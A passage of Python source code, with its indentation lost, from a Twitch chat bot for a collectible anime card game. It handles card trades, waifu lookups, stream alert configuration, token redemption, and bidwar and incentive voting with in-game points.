self.message(channel, "%s, one or more of the cards involved in the trade are no longer in their owners hands. Trade cancelled." % tags['display-name'], isWhisper)
cur.execute("UPDATE trades SET status = 'invalid', updated = %s WHERE id = %s", [current_milli_time(), trade[0]])
return
if (want['tradeableAt'] is not None and want['tradeableAt'] > current_milli_time()) or (have['tradeableAt'] is not None and have['tradeableAt'] > current_milli_time()):
self.message(channel, "%s, one or more of the cards involved in the trade are no longer able to be traded. Trade cancelled." % tags['display-name'], isWhisper)
cur.execute("UPDATE trades SET status = 'invalid', updated = %s WHERE id = %s", [current_milli_time(), trade[0]])
return
if subarg == "check":
wantdata = getWaifuById(want['waifuid'])
havedata = getWaifuById(have['waifuid'])
haveStr = getWaifuRepresentationString(havedata['id'], havedata['base_rarity'], have['rarity'], havedata['name'])
wantStr = getWaifuRepresentationString(wantdata['id'], wantdata['base_rarity'], want['rarity'], wantdata['name'])
payer = "they will pay you" if otherid == payup else "you will pay them"
if tradepoints > 0:
self.message(channel,
"{other} wants to trade their {have} for your {want} and {payer} {points} points. Accept it with !trade accept {other}".format(
other=otherparty, have=haveStr, want=wantStr, payer=payer,
points=tradepoints), isWhisper=isWhisper)
else:
self.message(channel,
"{other} wants to trade their {have} for your {want}. Accept it with !trade accept {other}".format(
other=otherparty, have=haveStr, want=wantStr, payer=payer),
isWhisper=isWhisper)
return
elif subarg == "decline":
cur.execute("UPDATE trades SET status = 'declined', updated = %s WHERE id = %s",
[current_milli_time(), trade[0]])
self.message(channel, "Trade declined.", isWhisper=isWhisper)
sendPushNotification([otherid], {'type': 'tradeDeclined', 'image': have['customImage'] if have['customImage'] != None else have['image'],
'message': "{otherplayer} has declined your trade offer.".format(
otherplayer=tags['display-name']),
'openurl': 'https://twitch.tv/nepnepbot'})
return
else:
# accept
nonpayer = ourid if payup == otherid else otherid
if tradepoints > 0 and not hasPoints(payup, tradepoints):
self.message(channel, "Sorry, but %s cannot cover the fair trading fee." % (
"you" if payup == ourid else otherparty),
isWhisper=isWhisper)
return
# move the cards
updateCard(want['id'], {"userid": otherid, "boosterid": None})
updateCard(have['id'], {"userid": ourid, "boosterid": None})
# cancel pending godimage requests for these cards
godRarity = int(config["numNormalRarities"]) - 1
if want['rarity'] == godRarity:
cur.execute("UPDATE godimage_requests SET state = 'cancelled' WHERE cardid = %s AND state = 'pending'", [want['id']])
if cur.rowcount > 0:
# a request was actually cancelled
wantdata = getWaifuById(want['waifuid'])
self.message("#%s" % sender, "Your image change request for [%d] %s was cancelled since you traded it away." % (want['waifuid'], wantdata['name']), True)
if have['rarity'] == godRarity:
cur.execute("UPDATE godimage_requests SET state = 'cancelled' WHERE cardid = %s AND state = 'pending'", [have['id']])
if cur.rowcount > 0:
# a request was actually cancelled
havedata = getWaifuById(have['waifuid'])
self.message("#%s" % otherparty, "Your image change request for [%d] %s was cancelled since you traded it away." % (have['waifuid'], havedata['name']), True)
attemptPromotions(want['waifuid'], have['waifuid'])
if want['rarity'] >= int(config["numNormalRarities"]):
checkFavouriteValidity(ourid)
if have['rarity'] >= int(config["numNormalRarities"]):
checkFavouriteValidity(otherid)
# points
addPoints(payup, -tradepoints)
addPoints(nonpayer, tradepoints)
# done
cur.execute("UPDATE trades SET status = 'accepted', updated = %s WHERE id = %s",
[current_milli_time(), trade[0]])
self.message(channel, "Trade executed!", isWhisper=isWhisper)
sendPushNotification([otherid], {'type': 'tradeAccepted', 'image': want['image'],
'message': "{otherplayer} has accepted your trade offer!".format(
otherplayer=tags['display-name']),
'openurl': 'https://twitch.tv/nepnepbot'})
return
if len(args) < 3:
self.message(channel,
"Usage: !trade <check/accept/decline/cancel> <user> OR !trade <user> <have> <want> OR !trade list",
isWhisper=isWhisper)
return
other = args[0]
cur.execute("SELECT id FROM users WHERE name = %s", [other])
otheridrow = cur.fetchone()
if otheridrow is None:
self.message(channel, "I don't recognize that username.", isWhisper=isWhisper)
return
otherid = int(otheridrow[0])
if ourid == otherid:
self.message(channel, "You cannot trade with yourself.", isWhisper)
return
ourhand = getHand(ourid)
otherhand = getHand(otherid)
try:
have = parseHandCardSpecifier(ourhand, args[1])
except CardNotInHandException:
self.message(channel, "%s, you don't own that waifu/card!" % tags['display-name'],
isWhisper)
return
except AmbiguousWaifuException:
self.message(channel,
"%s, you own more than one rarity of waifu %s! Please specify a card ID instead. You can find card IDs using !checkhand" % (
tags['display-name'], args[1]), isWhisper)
return
except ValueError:
self.message(channel, "Only whole numbers/IDs please.", isWhisper)
return
if have["tradeableAt"] is not None and have["tradeableAt"] > current_milli_time():
self.message(channel, "%s, the card you are attempting to send in the trade is not tradeable right now!" % tags['display-name'], isWhisper)
return
try:
want = parseHandCardSpecifier(otherhand, args[2])
except CardNotInHandException:
self.message(channel,
"%s, %s doesn't own that waifu/card!" % (tags['display-name'], other),
isWhisper)
return
except AmbiguousWaifuException:
self.message(channel,
"%s, %s owns more than one rarity of waifu %s! Please specify a card ID instead." % (
tags['display-name'], other, args[2]), isWhisper)
return
except ValueError:
self.message(channel, "Only whole numbers/IDs please.", isWhisper)
return
if want["tradeableAt"] is not None and want["tradeableAt"] > current_milli_time():
self.message(channel, "%s, the card you are attempting to receive in the trade is not tradeable right now!" % tags['display-name'], isWhisper)
return
# actual specials can't be traded
firstSpecialRarity = int(config["numNormalRarities"])
if have["rarity"] == firstSpecialRarity or want["rarity"] == firstSpecialRarity:
self.message(channel, "Sorry, cards of that rarity cannot be traded.", isWhisper)
return
payup = ourid
canTradeDirectly = (want["rarity"] == have["rarity"]) or (
want["rarity"] >= firstSpecialRarity and have["rarity"] >= firstSpecialRarity)
points = 0
if not canTradeDirectly:
if have["rarity"] >= firstSpecialRarity or want["rarity"] >= firstSpecialRarity:
self.message(channel,
"Sorry, irregular rarity cards can only be traded for other irregular rarity cards.",
isWhisper=isWhisper)
return
highercost = int(config["rarity" + str(max(have["rarity"], want["rarity"])) + "Value"])
lowercost = int(config["rarity" + str(min(have["rarity"], want["rarity"])) + "Value"])
points = highercost - lowercost
if want["rarity"] < have["rarity"]:
payup = otherid
# cancel any old trades with this pairing
cur.execute(
"UPDATE trades SET status = 'cancelled', updated = %s WHERE fromid = %s AND toid = %s AND status = 'open'",
[current_milli_time(), ourid, otherid])
# insert new trade
tradeData = [ourid, otherid, want['cardid'], have['cardid'], points, payup,
current_milli_time(), "$$whisper$$" if isWhisper else channel]
cur.execute(
"INSERT INTO trades (fromid, toid, want, have, points, payup, status, created, originChannel) VALUES(%s, %s, %s, %s, %s, %s, 'open', %s, %s)",
tradeData)
havedata = getWaifuById(have['waifuid'])
wantdata = getWaifuById(want['waifuid'])
haveStr = getWaifuRepresentationString(have['waifuid'], havedata['base_rarity'], have['rarity'],
havedata['name'])
wantStr = getWaifuRepresentationString(want['waifuid'], wantdata['base_rarity'], want['rarity'],
wantdata['name'])
paying = ""
if points > 0:
if payup == ourid:
paying = " with you paying them " + str(points) + " points"
else:
paying = " with them paying you " + str(points) + " points"
self.message(channel,
"Offered {other} to trade your {have} for their {want}{paying}".format(other=other,
have=haveStr,
want=wantStr,
paying=paying),
isWhisper=isWhisper)
sendPushNotification([otherid], {'type': 'tradeOffered', 'image': have['image'],
'message': "{otherplayer} wants to trade their {have} for your {want}.".format(
otherplayer=tags['display-name'], have=haveStr,
want=wantStr), 'openurl': 'https://twitch.tv/nepnepbot'})
return
if command == "lookup":
if len(args) != 1:
self.message(channel, "Usage: !lookup <id>", isWhisper=isWhisper)
return
if infoCommandAvailable(tags['user-id'], sender, tags['display-name'], self, channel, isWhisper):
try:
waifu = getWaifuById(args[0])
assert waifu is not None
assert waifu['can_lookup'] == 1
ownerData = getWaifuOwners(waifu['id'], waifu['base_rarity'])
ownerDescriptions = ownerData[0]
packholders = ownerData[1]
if len(ownerDescriptions) > 3:
ownerDescriptions = ownerDescriptions[0:2] + ["%d others" % (len(ownerDescriptions) - 2)]
waifu["rarity"] = config["rarity%dName" % waifu["base_rarity"]]
# check for packs
if len(ownerDescriptions) > 0:
waifu["owned"] = " - owned by " + ", ".join(ownerDescriptions)
if len(packholders) > 0:
waifu["owned"] += "; in a pack for: " + ", ".join(packholders)
elif len(packholders) > 0:
waifu["owned"] = " - in a pack for: " + ", ".join(packholders)
elif waifu["pulls"] > 0:
waifu["owned"] = " (not currently owned or in a pack)"
else:
waifu["owned"] = " (not dropped yet)"
# bounty info
if waifu["base_rarity"] >= int(config["numNormalRarities"]):
waifu["bountyinfo"] = ""
waifu["lp"] = ""
else:
with db.cursor() as cur:
cur.execute(
"SELECT COUNT(*), COALESCE(MAX(amount), 0) FROM bounties WHERE waifuid = %s AND status='open'",
[waifu['id']])
allordersinfo = cur.fetchone()
if allordersinfo[0] > 0:
cur.execute(
"SELECT amount FROM bounties WHERE userid = %s AND waifuid = %s AND status='open'",
[tags['user-id'], waifu['id']])
myorderinfo = cur.fetchone()
minfo = {"count": allordersinfo[0], "highest": allordersinfo[1]}
if myorderinfo is not None:
minfo["mine"] = myorderinfo[0]
if myorderinfo[0] == allordersinfo[1]:
waifu[
"bountyinfo"] = " {count} current bounties, your bid is highest at {highest} points.".format(
**minfo)
else:
waifu[
"bountyinfo"] = "{count} current bounties, your bid of {mine} points is lower than the highest at {highest} points.".format(
**minfo)
else:
waifu[
"bountyinfo"] = "{count} current bounties, the highest bid is {highest} points.".format(
**minfo)
else:
waifu["bountyinfo"] = "No current bounties on this waifu."
# last pull
if waifu["pulls"] == 0 or waifu["last_pull"] is None:
waifu["lp"] = ""
else:
lpdiff = (current_milli_time() - waifu["last_pull"]) // 86400000
if lpdiff == 0:
waifu["lp"] = " Last pulled less than a day ago."
elif lpdiff == 1:
waifu["lp"] = " Last pulled 1 day ago."
else:
waifu["lp"] = " Last pulled %d days ago." % lpdiff
self.message(channel,
'[{id}][{rarity}] {name} from {series} - {image}{owned}. {bountyinfo}{lp}'.format(
**waifu),
isWhisper=isWhisper)
if sender not in superadmins:
useInfoCommand(tags['user-id'], sender, channel, isWhisper)
except Exception as exc:
self.message(channel, "Invalid waifu ID.", isWhisper=isWhisper)
return
if command == "owners":
if len(args) != 1:
self.message(channel, "Usage: !owners <id>", isWhisper=isWhisper)
return
if infoCommandAvailable(tags['user-id'], sender, tags['display-name'], self, channel, isWhisper):
try:
waifu = getWaifuById(args[0])
assert waifu is not None
assert waifu['can_lookup'] == 1
ownerData = getWaifuOwners(waifu['id'], waifu['base_rarity'])
ownerDescriptions = ownerData[0]
packholders = ownerData[1]
waifu["rarity"] = config["rarity%dName" % waifu["base_rarity"]]
if len(ownerDescriptions) > 0:
waifu["owned"] = " is owned by " + ", ".join(ownerDescriptions)
if len(packholders) > 0:
waifu["owned"] += "; in a pack for: " + ", ".join(packholders)
elif len(packholders) > 0:
waifu["owned"] = " is in a pack for: " + ", ".join(packholders)
elif waifu["pulls"] > 0:
waifu["owned"] = " is not currently owned or in a pack"
else:
waifu["owned"] = " has not dropped yet"
self.message(channel,
'[{id}][{rarity}] {name} from {series}{owned}.'.format(
**waifu),
isWhisper=isWhisper)
if sender not in superadmins:
useInfoCommand(tags['user-id'], sender, channel, isWhisper)
except Exception:
self.message(channel, "Invalid waifu ID.", isWhisper=isWhisper)
return
if command == "whisper":
if followsme(tags['user-id']):
self.message("#jtv", "/w {user} This is a test whisper.".format(user=sender), isWhisper=False)
self.message(channel, "Attempted to send test whisper.", isWhisper=isWhisper)
else:
self.message(channel, "{user}, you need to be following me so I can send you whispers!".format(
user=str(tags['display-name'])), isWhisper=isWhisper)
return
if command == "help":
self.message(channel, config["siteHost"] + "/help", isWhisper=isWhisper)
if command == "nepdoc":
self.message(channel, config["nepdocURL"], isWhisper=isWhisper)
if command == "alerts" or command == "alert":
if len(args) < 1:
self.message(channel,
"Usage: !alerts setup OR !alerts test <rarity/set> OR !alerts config <config Name> <config Value>",
isWhisper=isWhisper)
return
sender = sender.lower()
subcmd = str(args[0]).lower()
if subcmd == "setup":
cur = db.cursor()
cur.execute("SELECT alertkey FROM channels WHERE name=%s", [sender])
row = cur.fetchone()
if row is None:
self.message(channel,
"The bot is not in your channel, so alerts can't be set up for you. Ask an admin to let it join!",
isWhisper=isWhisper)
return
if row[0] is None:
self.message("#jtv",
"/w {user} Please go to the following link and allow access: {link}{user}".format(
user=sender.strip(), link=str(streamlabsauthurl).strip()), isWhisper=False)
self.message(channel,
"Sent you a whisper with a link to set up alerts. If you didnt receive a whisper, try !whisper",
isWhisper=isWhisper)
else:
self.message(channel,
"Alerts seem to already be set up for your channel! Use !alerts test to test them!",
isWhisper)
cur.close()
return
if subcmd == "test":
isSet = False
if len(args) > 1 and args[1].lower() == "set":
rarity = int(config["numNormalRarities"]) - 1
isSet = True
else:
try:
rarity = parseRarity(args[1])
except Exception:
rarity = int(config["numNormalRarities"]) - 1
cur = db.cursor()
cur.execute("SELECT alertkey FROM channels WHERE name=%s", [sender])
row = cur.fetchone()
cur.close()
if row is None or row[0] is None:
self.message(channel,
"Alerts do not seem to be set up for your channel, please set them up using !alerts setup",
isWhisper=isWhisper)
else:
if isSet:
threading.Thread(target=sendSetAlert, args=(
sender, sender, "Test Set", ["Neptune", "Nepgear", "Some other test waifu"], "0 pudding",
False, False)).start()
else:
threading.Thread(target=sendDrawAlert, args=(
sender, {"name": "Test Alert, please ignore", "base_rarity": rarity,
"image": "http://t.fuelr.at/k6g"},
str(tags["display-name"]), False)).start()
self.message(channel, "Test Alert sent.", isWhisper=isWhisper)
return
if subcmd == "config":
try:
configName = args[1]
except Exception:
self.message(channel, "Valid alert config options: " + ", ".join(validalertconfigvalues),
isWhisper=isWhisper)
return
if configName == "reset":
cur = db.cursor()
cur.execute("DELETE FROM alertConfig WHERE channelName = %s", [sender])
cur.close()
self.message(channel, "Removed all custom alert config for your channel. #NoireScreamRules",
isWhisper=isWhisper)
return
if configName not in validalertconfigvalues:
self.message(channel, "Valid alert config options: " + ", ".join(validalertconfigvalues),
isWhisper=isWhisper)
return
try:
configValue = args[2]
except Exception:
cur = db.cursor()
cur.execute("SELECT val FROM alertConfig WHERE channelName=%s AND config = %s",
[sender, configName])
rows = cur.fetchall()
if len(rows) != 1:
self.message(channel, 'Alert config "' + configName + '" is unset for your channel.',
isWhisper=isWhisper)
else:
configValue = rows[0][0]
self.message(channel,
'Alert config "' + configName + '" is set to "' + configValue + '" for your channel.',
isWhisper=isWhisper)
cur.close()
return
cur = db.cursor()
cur.execute("SELECT val FROM alertConfig WHERE channelName=%s AND config = %s",
[sender, configName])
rows = cur.fetchall()
if configValue == "reset":
cur.execute("DELETE FROM alertConfig WHERE channelName=%s AND config=%s", [sender, configName])
cur.close()
self.message(channel, 'Reset custom alert config "' + configName + '" for your channel.',
isWhisper=isWhisper)
return
if configName == "alertChannel" and configValue not in ["host", "donation", "follow", "reset",
"subscription"]:
self.message(channel,
'Valid options for alertChannel: "host", "donation", "follow", "subscription", "reset"')
cur.close()
return
if len(rows) == 1:
cur.execute("UPDATE alertConfig SET val=%s WHERE channelName=%s AND config = %s",
[configValue, sender, configName])
else:
cur.execute("INSERT INTO alertConfig(val, channelName, config) VALUE (%s, %s, %s)",
[configValue, sender, configName])
cur.close()
self.message(channel, 'Set alert config value "' + configName + '" to "' + configValue + '"',
isWhisper=isWhisper)
return
self.message(channel,
"Usage: !alerts setup OR !alerts test <rarity> OR !alerts config <config Name> <config Value>",
isWhisper=isWhisper)
return
if command == "togglehoraro" and sender in admins and booleanConfig("marathonBotFunctions"):
self.autoupdate = not self.autoupdate
if self.autoupdate:
self.message(channel, "Enabled Horaro Auto-update.", isWhisper=isWhisper)
else:
self.message(channel, "Disabled Horaro Auto-update.", isWhisper=isWhisper)
return
if sender in admins and command in ["status", "title"] and isMarathonChannel and booleanConfig("marathonBotFunctions"):
updateTitle(" ".join(args))
self.message(channel, "%s -> Title updated to %s." % (tags['display-name'], " ".join(args)))
return
if sender in admins and command == "game" and isMarathonChannel and booleanConfig("marathonBotFunctions"):
updateGame(" ".join(args))
self.message(channel, "%s -> Game updated to %s." % (tags['display-name'], " ".join(args)))
return
if sender in admins and booleanConfig("marathonBotFunctions") and command == "ffzfollowing":
MarathonBot.instance.updateFollowButtons(args)
self.message(channel, "%s -> Attempted to update follower buttons to %s." % (tags['display-name'], ", ".join(args)))
return
if command == "emotewar":
if int(config["emoteWarStatus"]) == 0:
self.message(channel, "The Emote War is not active right now.", isWhisper)
return
with db.cursor() as cur:
cur.execute("SELECT `name`, `count` FROM emoteWar ORDER BY `count` DESC")
r = cur.fetchall()
msg = "Current War: " if int(config["emoteWarStatus"]) == 1 else "THE WAR HAS BEEN DECIDED: "
for row in r:
msg += str(row[0]) + " " + str(row[1]) + " "
msg += ". Spamming DOES NOT COUNT, spammers will get timed out."
self.message(channel, msg, isWhisper=isWhisper)
return
if command == "nepjoin" and sender.lower() in superadmins:
if len(args) != 1:
self.message(channel, "Usage: !nepjoin <channelname>", isWhisper=isWhisper)
return
chan = str(args[0]).replace("'", "").lower()
if ('#' + chan) in self.mychannels or ('#' + chan) in self.addchannels:
self.message(channel, "Already in that channel!", isWhisper=isWhisper)
return
try:
cur = db.cursor()
cur.execute("SELECT COUNT(*) FROM users WHERE name=%s", [str(chan)])
if (cur.fetchone()[0] or 0) < 1:
self.message(channel,
"That user is not yet in the database! Let them talk in a channel the Bot is in to change that!",
isWhisper=isWhisper)
cur.close()
return
cur.execute("INSERT INTO channels(name) VALUES (%s)", [str(chan)])
self.join("#" + chan)
self.message("#" + chan, "Hi there!", isWhisper=False)
self.addchannels.append('#' + chan)
self.message(channel, "Joined #" + chan, isWhisper=isWhisper)
cur.close()
return
except Exception:
self.message(channel, "Tried joining, failed. Tell Marenthyu the following: " + str(sys.exc_info()),
isWhisper=isWhisper)
logger.error("Error Joining channel %s: %s", chan, str(sys.exc_info()))
return
if command == "nepleave" and (sender in superadmins or ("#" + sender) == str(channel)):
if len(args) > 0:
self.message(channel, "nepleave doesn't take in argument. Type it in the channel to leave.",
isWhisper=isWhisper)
return
try:
cur = db.cursor()
cur.execute("DELETE FROM channels WHERE name = %s", [channel[1:]])
self.leavechannels.append(str(channel))
# self.mychannels.remove(str(channel))
self.message(channel, "ByeBye!", isWhisper=False)
self.part(channel)
cur.close()
return
except Exception:
self.message(channel, "Tried to leave but failed D:", isWhisper=isWhisper)
logger.error("Error leaving %s: %s", channel, str(sys.exc_info()))
return
if command == "reload" and sender in superadmins:
# print("in reload command")
loadConfig()
self.message(channel, "Config reloaded.", isWhisper=isWhisper)
return
if command == "redeem":
if len(args) != 1:
self.message(channel, "Usage: !redeem <token>", isWhisper=isWhisper)
return
cur = db.cursor()
# Are they a DeepDigger?
cur.execute(
"SELECT id, points, waifuid, boostername, type, badgeID FROM tokens WHERE token=%s AND claimable=1 AND (only_redeemable_by IS NULL OR only_redeemable_by = %s) AND (not_redeemable_by IS NULL OR not_redeemable_by != %s) LIMIT 1",
[args[0], tags['user-id'], tags['user-id']])
redeemablerows = cur.fetchall()
if len(redeemablerows) == 0:
self.message(channel, "Unknown token.", isWhisper)
cur.close()
return
redeemdata = redeemablerows[0]
# already claimed by this user?
cur.execute("SELECT COUNT(*) FROM tokens_claimed WHERE tokenid = %s AND userid = %s",
[redeemdata[0], tags['user-id']])
claimed = cur.fetchone()[0] or 0
if claimed > 0:
self.message(channel, "%s, you have already claimed this token!" % tags['display-name'], isWhisper)
cur.close()
return
# booster?
packid = None
cardid = None
received = []
if redeemdata[3] is not None:
# check for an open booster in their account
# checked first because it's the only way a redeem can be blocked entirely
cur.execute("SELECT COUNT(*) FROM boosters_opened WHERE userid = %s AND status = 'open'",
[tags['user-id']])
boosteropen = cur.fetchone()[0] or 0
if boosteropen > 0:
self.message(channel,
"%s, you can't claim this token while you have an open booster! !booster show to check it." %
tags['display-name'], isWhisper)
cur.close()
return
try:
packid = openBooster(self, tags['user-id'], sender, tags['display-name'], channel, isWhisper, redeemdata[3],
False)
if checkHandUpgrade(tags['user-id']):
messageForHandUpgrade(tags['user-id'], tags['display-name'], self, channel, isWhisper)
received.append("a free booster: %s/booster?user=%s" % (config["siteHost"], sender))
except InvalidBoosterException:
discordbody = {
"username": "WTCG Admin",
"content" : "Booster type %s is broken, please fix it." % redeemdata[3]
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel,
"There was an error processing your redeem, please try again later.",
isWhisper)
cur.close()
return
# waifu?
if redeemdata[2] is not None:
waifuinfo = getWaifuById(redeemdata[2])
cardid = addCard(tags['user-id'], waifuinfo['id'], 'redeem')
if waifuinfo['base_rarity'] < int(config["numNormalRarities"]) - 1:
attemptPromotions(waifuinfo['id'])
waifuinfo['rarity'] = config["rarity%dName" % waifuinfo['base_rarity']]
received.append("A waifu: [{id}][{rarity}] {name} from {series}".format(**waifuinfo))
# points
if redeemdata[1] != 0:
addPoints(tags['user-id'], redeemdata[1])
received.append("%d points" % redeemdata[1])
# badge?
if redeemdata[5] is not None:
badge = getBadgeByID(redeemdata[5])
success = giveBadge(tags['user-id'], badge["id"])
if success:
received.append("A shiny new Badge: %s" % badge["name"])
else:
received.append("An invalid badge, or a badge you already had: %s" % badge["name"])
cur.execute(
"INSERT INTO tokens_claimed (tokenid, userid, points, waifuid, cardid, boostername, boosterid, timestamp, badgeID) VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s)",
[redeemdata[0], tags['user-id'], redeemdata[1], redeemdata[2], cardid, redeemdata[3], packid,
current_milli_time(), redeemdata[5]])
# single use?
if redeemdata[4] == 'single':
cur.execute("UPDATE tokens SET claimable = 0 WHERE id = %s", [redeemdata[0]])
# show results
self.message(channel,
"%s -> Successfully redeemed the token %s, added the following to your account -> %s" % (
tags['display-name'], args[0], " and ".join(received[::-1])), isWhisper)
cur.close()
return
if command == "wars":
with db.cursor() as cur:
cur.execute("SELECT id, title FROM bidWars WHERE status = 'open'")
wars = []
warnum = 0
for war in cur.fetchall():
warnum += 1
wars.append("%s%s (!war %s)" % ("; " if warnum > 1 else "", war[1], war[0]))
if len(wars) == 0:
self.message(channel,
"%s, there are no bidwars currently open right now." % tags['display-name'],
isWhisper)
else:
messages = ["Current Bidwars: "]
for war in wars:
if len(messages[-1]) + len(war) > 400:
messages.append(war)
else:
messages[-1] += war
for message in messages:
self.message(channel, message, isWhisper)
return
if command == "war":
if len(args) != 1:
self.message(channel, "Usage: !war <id>", isWhisper)
return
with db.cursor() as cur:
cur.execute(
"SELECT id, title, status, openEntry, openEntryMinimum, openEntryMaxLength FROM bidWars WHERE id = %s AND status != 'hidden'",
[args[0]])
war = cur.fetchone()
if war is None:
self.message(channel, "%s -> Invalid bidwar specified." % tags['display-name'], isWhisper)
return
warid = war[0]
title = war[1]
status = war[2]
openEntry = war[3] != 0
openEntryMinimum = war[4]
openEntryMaxLength = war[5]
# get choices
cur.execute(
"SELECT choice, amount FROM bidWarChoices WHERE warID = %s ORDER BY amount DESC, choice ASC",
[warid])
choices = cur.fetchall()
# render
if len(choices) == 0:
if openEntry and status == 'open':
self.message(channel,
"The %s bidwar has no choices defined yet! Add your own for %d or more points with !vote %s <choice> <points>" % (
title, openEntryMinimum, warid), isWhisper)
else:
# this bidwar was never setup properly, ignore it exists
self.message(channel, "%s -> Invalid bidwar specified." % tags['display-name'], isWhisper)
return
if status == 'closed':
# does the "first place" actually have any votes?
if choices[0][1] == 0:
# no, so this bid war hasn't started yet, don't let on it exists
self.message(channel, "%s -> Invalid bidwar specified." % tags['display-name'], isWhisper)
else:
runnersup = ", ".join("%s (%d points)" % (choice[0], choice[1]) for choice in choices[1:])
self.message(channel,
"The %s bidwar is over! The winner was %s with %d points. Runners up: %s" % (
title, choices[0][0], choices[0][1], runnersup), isWhisper)
else:
# open war
choicesStr = ", ".join("%s (%d points)" % (choice[0], choice[1]) for choice in choices)
msg = "The %s bidwar is currently open! Current votes: %s. !vote %s <choice> <points> to have your say." % (
title, choicesStr, warid)
if openEntry:
msg += " You can add a new choice by contributing at least %d points (%d characters maximum)." % (
openEntryMinimum, openEntryMaxLength)
self.message(channel, msg, isWhisper)
return
if command in ["vote", "donate"] and isMarathonChannel:
# pudding mode?
puddingMode = False
if len(args) > 0 and args[-1].lower() == "pudding":
puddingMode = True
args = args[:-1]
if len(args) == 1:
# special case: is there only 1 incentive and no bidwars?
with db.cursor() as cur:
cur.execute("SELECT COUNT(*) FROM bidWars WHERE `status` = 'open'")
warCount = cur.fetchone()[0] or 0
cur.execute("SELECT COUNT(*) FROM incentives WHERE `status` = 'open'")
incCount = cur.fetchone()[0] or 0
if warCount == 0 and incCount == 1:
# donate to that incentive
cur.execute("SELECT id FROM incentives WHERE `status` = 'open' LIMIT 1")
args = [cur.fetchone()[0]] + args
if len(args) < 2:
if command == "vote":
self.message(channel, "Usage: !vote <warid> <choice> <amount>", isWhisper)
else:
self.message(channel,
"Usage: !donate <id> <amount> (!incentives to see a list of incentives / IDs)",
isWhisper)
return
with db.cursor() as cur:
# find out if this is a bidwar, an incentive or nothing
cur.execute("SELECT id, title, status, openEntry, openEntryMinimum, openEntryMaxLength FROM bidWars WHERE id = %s AND status != 'hidden'", [args[0]])
war = cur.fetchone()
if war is not None:
if len(args) < 3:
self.message(channel, "Usage: !vote <warid> <choice> <amount>", isWhisper)
return
warid = war[0]
title = war[1]
status = war[2]
openEntry = war[3] != 0
openEntryMinimum = war[4]
openEntryMaxLength = war[5]
if status == 'closed':
self.message(channel, "%s -> That bidwar is currently closed." % tags['display-name'])
return
# pudding mode?
exchangeRate = int(config["puddingExchangeRateMarathon"])
currency = 'pudding' if puddingMode else 'points'
# check their points entry
try:
points = int(args[-1])
if points <= 0:
raise ValueError()
except ValueError:
self.message(channel, "%s -> Invalid amount of points/pudding entered." % tags['display-name'])
return
if puddingMode:
if not hasPudding(tags['user-id'], points):
self.message(channel, "%s -> You don't have that much pudding!" % tags['display-name'])
return
contribution = points * exchangeRate
contributionStr = "%d pudding (-> %d points)" % (points, contribution)
else:
if not hasPoints(tags['user-id'], points):
self.message(channel, "%s -> You don't have that many points!" % tags['display-name'])
return
contribution = points
contributionStr = "%d points" % points
cur.execute(
"SELECT choice, amount FROM bidWarChoices WHERE warID = %s ORDER BY amount DESC, choice ASC",
[warid])
choices = cur.fetchall()
choiceslookup = [choice[0].lower() for choice in choices]
theirchoice = " ".join(args[1:-1]).strip()
theirchoiceL = theirchoice.lower()
if theirchoiceL not in choiceslookup:
# deal with custom choice entry
if not openEntry:
self.message(channel, "%s -> That isn't a valid choice for the %s bidwar." % (
tags['display-name'], title))
return
for word in bannedWords:
if word in theirchoiceL:
#self.message(channel, ".timeout %s 300" % sender, isWhisper)
self.message(channel,
"%s -> No vulgar choices allowed (warning)" % tags['display-name'])
return
if contribution < openEntryMinimum:
self.message(channel,
"%s -> You must contribute at least %d points or %d pudding to add a new choice to this bidwar!" % (
tags['display-name'], openEntryMinimum, math.ceil(openEntryMinimum / exchangeRate)), isWhisper)
return
if len(theirchoice) > openEntryMaxLength:
self.message(channel,
"%s -> The maximum length of a choice in the %s bidwar is %d characters." % (
tags['display-name'], title, openEntryMaxLength), isWhisper)
return
# all clear, add it
if puddingMode:
takePudding(tags['user-id'], points)
else:
addPoints(tags['user-id'], -points)
actionTime = current_milli_time()
qargs = [warid, theirchoice, contribution, actionTime, tags['user-id'], actionTime, tags['user-id']]
cur.execute(
"INSERT INTO bidWarChoices (warID, choice, amount, created, creator, lastVote, lastVoter) VALUES(%s, %s, %s, %s, %s, %s, %s)",
qargs)
logargs = [tags['user-id'], warid, theirchoice, points, contribution, currency, current_milli_time()]
else:
# already existing choice, just vote for it
if puddingMode:
takePudding(tags['user-id'], points)
else:
addPoints(tags['user-id'], -points)
qargs = [contribution, current_milli_time(), tags['user-id'], warid, theirchoiceL]
cur.execute(
"UPDATE bidWarChoices SET amount = amount + %s, lastVote = %s, lastVoter = %s WHERE warID = %s AND choice = %s",
qargs)
logargs = [tags['user-id'], warid, theirchoiceL, points, contribution, currency, current_milli_time()]
cur.execute("INSERT INTO `contributionLog` (`userid`, `to_id`, `to_choice`, `raw_amount`, `contribution`, `currency`, `timestamp`) " +
"VALUES(%s, %s, %s, %s, %s, %s, %s)", logargs)
self.message(channel, "%s -> Successfully added %s to %s in the %s bidwar." % (
tags['display-name'], contributionStr, theirchoice, title))
return
else:
cur.execute("SELECT id, title, amount, required FROM incentives WHERE id = %s AND status = 'open'", [args[0]])
incentive = cur.fetchone()
if incentive is None:
self.message(channel, "%s -> Invalid incentive/war ID." % tags['display-name'])
return
incid = incentive[0]
title = incentive[1]
currAmount = incentive[2]
required = incentive[3]
memeMult = (10000000 if incid == "BonusGame" else 1)
if currAmount >= required:
self.message(channel,
"%s -> The %s incentive has already been met!" % (tags['display-name'], title))
return
try:
points = int(args[1])
if points <= 0:
raise ValueError()
except ValueError:
self.message(channel, "%s -> Invalid amount of points/pudding entered." % tags['display-name'])
return
if puddingMode:
exchangeRate = int(config["puddingExchangeRateMarathon"])
points = min(points, math.ceil((required - currAmount) / exchangeRate))
if not hasPudding(tags['user-id'], points):
self.message(channel, "%s -> You don't have that much pudding!" % tags['display-name'])
return
takePudding(tags['user-id'], points)
contribution = min(points * exchangeRate, required - currAmount)
contributionStr = "%d pudding (-> %d points)" % (points, contribution * memeMult)
currency = 'pudding'
else:
points = min(points, required - currAmount)
if not hasPoints(tags['user-id'], points):
self.message(channel, "%s -> You don't have that many points!" % tags['display-name'])
return
addPoints(tags['user-id'], -points)
contribution = points
contributionStr = "%d points" % (points * memeMult)
currency = 'points'
cur.execute(
"UPDATE incentives SET amount = amount + %s, lastContribution = %s, lastContributor = %s WHERE id = %s",
[contribution, current_milli_time(), tags['user-id'], incid])
logargs = [tags['user-id'], incid, None, points, contribution, currency, current_milli_time()]
